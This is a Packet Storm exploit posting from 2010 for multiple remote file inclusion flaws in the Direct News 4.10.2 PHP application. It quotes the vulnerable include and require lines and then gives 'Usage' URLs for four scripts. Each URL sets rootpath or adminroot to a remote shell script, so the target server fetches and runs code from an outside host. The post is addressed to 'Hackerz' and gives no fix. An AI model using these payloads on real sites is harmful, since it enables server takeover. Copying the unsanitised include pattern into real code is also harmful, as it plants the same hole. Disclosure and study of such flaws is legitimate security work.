Direct News 4.10.2 Remote File Inclusion

2010-03-28T00:00:00
ID PACKETSTORM:87679
Type packetstorm
Reporter mat
Modified 2010-03-28T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo--------------------------------------------------  
Direct News 4.10.2 Multiple Remote File Include Vulnerability  
Script: http://code.google.com/p/directnews/downloads/list  
Author: mat  
Mail: rahmat_punk@hotmail.com  
---------------Ooooo------------------------------------------------  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
  
#################################################  
#Vuln Code (directnews-4.10-open-20090506/admin/menu.php)  
#  
#<?...  
#include_once $rootpath .'/library/lib.menu.php';  
#include_once $rootpath .'/modules/menu/lib/treemenu.inc.php';  
#...?>  
#################################################  
#################################################  
#Vuln Code (directnews-4.10-open-20090506/admin/media/update_content.php)  
#  
#<?...  
#require_once $adminroot . '/inc.php';  
#require_once './lib.media.php';  
#require_once $adminroot . '/verif_identite.php';  
#...?>  
#################################################  
#################################################  
#Vuln Code (directnews-4.10-open-20090506/library/class.backup.php)  
#  
#<?...  
#require_once $adminroot .'/inc.php';  
#...?>  
#################################################  
#################################################  
#Vuln Code (directnews-4.10-open-20090506/library/lib.menu.php)  
#  
#<?...  
#require_once $rootpath . '/library/class.menuPere.php';  
#...?>  
#################################################  
  
Usage: http://[target]/[path]/admin/menu_xml.php?rootpath=http://[shellscript]  
http://[target]/[path]/admin/media/update_content.php?adminroot=http://[shellscript]  
http://[target]/[path]/library/class.backup.php?adminroot=http://[shellscript]  
http://[target]/[path]/library/lib.menu.php?rootpath=http://[shellscript]  
  
Greetings: All Hackerz  
`